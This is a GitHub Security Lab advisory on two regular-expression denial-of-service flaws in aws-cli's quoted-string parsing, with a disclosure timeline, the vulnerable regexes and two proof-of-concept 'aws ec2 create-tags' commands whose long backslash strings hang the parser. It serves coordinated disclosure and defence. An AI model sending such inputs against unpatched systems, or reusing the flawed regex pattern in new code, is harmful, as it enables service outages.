GHSL-2024-264_GHSL-2024-265: Regular Expression Denial of Service (ReDoS) vulnerabilities in aws-cli

Coordinated Disclosure Timeline

• 2024-10-11: Submitted report: https://hackerone.com/reports/2776935
• 2024-10-18: Pull request that includes our suggested fix (V2 branch): https://github.com/aws/aws-cli/pull/8992
• 2024-10-21: Pull request that includes our suggested fix (V1 branch): https://github.com/aws/aws-cli/pull/8999
• 2024-10-24: Version 2.18.14 released.
• 2024-10-24: Version 1.35.14 released.
• 2024-11-21: Hackerone report marked resolved.

Summary

aws-cli has two regexes with ReDoS vulnerabilities.

Project

aws-cli

Tested Version

aws-cli/1.34.32 Python/3.12.3 Linux/6.8.0-41-generic botocore/1.35.32

Details

Issue 1: ReDoS in _SINGLE_QUOTED (GHSL-2024-264)

The _SINGLE_QUOTED regex has a ReDoS vulnerability:

_SINGLE_QUOTED = _NamedRegex('singled quoted', r'\'(?:\\\\|\\\'|[^\'])*\'')

Proof of concept

The following command fails to terminate:

./venv-aws-cli/bin/aws ec2 create-tags --tags x=x,"'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\" --resources yyy

This vulnerability was discovered with the help of CodeQL’s Inefficient regular expression query.

Impact

This issue may lead to a denial of service.

Issue 2: ReDoS in _DOUBLE_QUOTED (GHSL-2024-265)

The _DOUBLE_QUOTED regex has a ReDoS vulnerability:

_DOUBLE_QUOTED = _NamedRegex('double quoted', r'"(?:\\\\|\\"|[^"])*"')

Proof of concept

The following command fails to terminate:

./venv-aws-cli/bin/aws ec2 create-tags --tags x=x,'"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --resources yyy

Impact

This issue may lead to a denial of service.

Credit

These issues were discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-264 or GHSL-2024-265 in any communication regarding these issues.